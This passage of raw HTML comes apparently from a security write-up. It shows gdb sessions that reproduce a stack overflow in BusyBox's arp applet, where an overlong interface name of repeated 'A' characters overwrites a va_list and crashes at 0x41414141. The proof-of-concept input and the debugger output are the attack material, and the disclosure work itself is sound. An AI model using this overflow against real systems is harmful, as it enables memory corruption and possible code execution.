class=\"crayon-v\">ifru_flags<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">16705<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ifru_ivalue<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1094795585<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ifru_mtu<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1094795585<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ifru_map<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f99206532694-64\"><span class=\"crayon-h\">\t&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">mem_start<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1094795585<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">mem_end<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1094795585<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">base_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">16705<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">irq<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">65<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;A&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">dma<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">65<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;A&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">65<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;A&#8217;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f99206532694-65\"><span class=\"crayon-h\">\t&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">ifru_slave<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;A&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">repeats<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">16<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">times<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ifru_newname<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;A&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">repeats<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">16<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">times<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ifru_data<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x41414141<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">Address<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x41414141<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">out <\/span><span class=\"crayon-e\">of <\/span><span class=\"crayon-v\">bounds<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f99206532694-66\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-p\">#5&nbsp;&nbsp;0x41414141 in ?? ()<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f99206532694-67\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">No <\/span><span class=\"crayon-e\">symbol <\/span><span class=\"crayon-e\">table <\/span><span class=\"crayon-e\">info <\/span><span class=\"crayon-v\">available<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f99206532694-68\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-p\">#6&nbsp;&nbsp;0x41414141 in ?? ()<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f99206532694-69\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">No <\/span><span class=\"crayon-e\">symbol <\/span><span class=\"crayon-e\">table <\/span><span class=\"crayon-e\">info <\/span><span class=\"crayon-v\">available<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f99206532694-70\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-p\">#7&nbsp;&nbsp;0x41414141 in ?? ()<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0113 seconds] -->  <\/p>\n<p>A debugging session shows that we messed up the <code>va_list<\/code> on stack with the user provided string.<\/p>\n<p>crosscheck: valid run (no crash expected, <code>IFNAME=AAAAA<\/code>):<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58867ec288f9d478959868\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> \t# gdb &#8211;args .\/busybox_unstripped arp  -Ds 1.1.1.1 $(python -c &#8220;print &#8216;A&#8217;*(5)&#8221;)  \t(gdb) b ioctl_or_perror_and_die  \tBreakpoint 1 at 0x80f1851: file libbb\/xfuncs_printf.c, line 501.  \t(gdb) r  \tStarting program: \/src\/busybox-dhcp\/busybox_unstripped arp -Ds 1.1.1.1 AAAAA  \t  \tBreakpoint 1, ioctl_or_perror_and_die (fd=3, request=35111, argp=0xbffff5a4, fmt=0x820cc85 &#8220;can&#8217;t get HW-Address for &#8216;%s'&#8221;)  \t    at libbb\/xfuncs_printf.c:501  \t501     {  \t(gdb) s  \t505             ret = ioctl(fd, request, argp);  \t(gdb) s  \t506             if (ret &lt; 0) {  \t(gdb) s  \t507                     va_start(p, fmt);  \t(gdb) s  \t508                     bb_verror_msg(fmt, p, strerror(errno));  \t(gdb) x\/10s p  \t0xbffff5a0:      &#8220;375370377277AAAAA&#8221;\t\t\t\t\t\t\t\t\t\t\t\t\t\/** !! valid va_list struct for 5*A*\/  \t0xbffff5aa:      &#8220;377277365370377277&#8221;  \t0xbffff5b1:      &#8220;&#8221;  \t0xbffff5b2:      &#8220;&#8221;  \t0xbffff5b3:      &#8220;&#8221;  \t0xbffff5b4:      &#8220;300207$bp9\u000022b324365377277365370377277b7\u000021b375370377277364365377277D&#8221;  \t0xbffff5d2:      &#8220;&#8221;  \t0xbffff5d3:      &#8220;&#8221;  \t0xbffff5d4:      &#8220;\u000002&#8221;  \t0xbffff5d6:      &#8220;&#8221;  \t(gdb)<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f9d478959868-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f9d478959868-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f9d478959868-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f9d478959868-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f9d478959868-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f9d478959868-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f9d478959868-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f9d478959868-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f9d478959868-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f9d478959868-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f9d478959868-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f9d478959868-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f9d478959868-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f9d478959868-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f9d478959868-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f9d478959868-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f9d478959868-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f9d478959868-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f9d478959868-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f9d478959868-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f9d478959868-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f9d478959868-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f9d478959868-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f9d478959868-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f9d478959868-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f9d478959868-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f9d478959868-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f9d478959868-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f9d478959868-29\">29<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58867ec288f9d478959868-1\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-p\"># gdb &#8211;args .\/busybox_unstripped arp&nbsp;&nbsp;-Ds 1.1.1.1 $(python -c &#8220;print &#8216;A&#8217;*(5)&#8221;)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f9d478959868-2\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">gdb<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">b<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ioctl_or_perror_and_die<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f9d478959868-3\"><span class=\"crayon-e\">\t<\/span><span class=\"crayon-i\">Breakpoint<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">at<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x80f1851<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">file <\/span><span class=\"crayon-v\">libbb<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">xfuncs_printf<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">c<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">line<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">501.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f9d478959868-4\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">gdb<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">r<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f9d478959868-5\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">Starting <\/span><span class=\"crayon-v\">program<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">src<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">busybox<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">dhcp<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-e\">busybox_unstripped <\/span><span class=\"crayon-v\">arp<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">Ds<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1.1.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">AAAAA<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f9d478959868-6\"><span class=\"crayon-e\">\t<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f9d478959868-7\"><span class=\"crayon-e\">\t<\/span><span class=\"crayon-i\">Breakpoint<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ioctl_or_perror_and_die<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fd<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">request<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">35111<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">argp<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0xbffff5a4<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">fmt<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0x820cc85<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;can&#8217;t get HW-Address for &#8216;%s'&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f9d478959868-8\"><span class=\"crayon-h\">\t&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">at <\/span><span class=\"crayon-v\">libbb<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">xfuncs_printf<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">c<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">501<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f9d478959868-9\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">501<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f9d478959868-10\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">gdb<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">s<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f9d478959868-11\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">505<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">ret<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ioctl<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fd<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">request<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">argp<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f9d478959868-12\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">gdb<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">s<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f9d478959868-13\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">506<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ret<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f9d478959868-14\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">gdb<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">s<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f9d478959868-15\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">507<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-e\">va_start<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">fmt<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f9d478959868-16\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">gdb<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">s<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f9d478959868-17\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">508<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-e\">bb_verror_msg<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fmt<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">strerror<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">errno<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f9d478959868-18\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">gdb<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">10s<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">p<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f9d478959868-19\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0xbffff5a0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;375370377277AAAAA&#8221;<\/span><span class=\"crayon-h\">\t\t\t\t\t\t\t\t\t\t\t\t\t<\/span><span class=\"crayon-c\">\/** !! valid va_list struct for 5*A*\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f9d478959868-20\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0xbffff5aa<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;377277365370377277&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f9d478959868-21\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0xbffff5b1<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f9d478959868-22\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0xbffff5b2<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f9d478959868-23\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0xbffff5b3<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f9d478959868-24\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0xbffff5b4<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;300207$bp9\u000022b324365377277365370377277b7\u000021b375370377277364365377277D&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f9d478959868-25\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0xbffff5d2<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f9d478959868-26\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0xbffff5d3<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f9d478959868-27\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0xbffff5d4<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;\u000002&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f9d478959868-28\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0xbffff5d6<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f9d478959868-29\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">gdb<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0048 seconds] -->  <\/p>\n<p>see inline comments: va_list on stack shown by <code>x\/10s p<\/code><\/p>\n<p>now overflow <code>va_list<\/code> by providing <code>IFNAME=A*(64+40+40)<\/code> (crash expected):<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58867ec288fa0148121245\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button 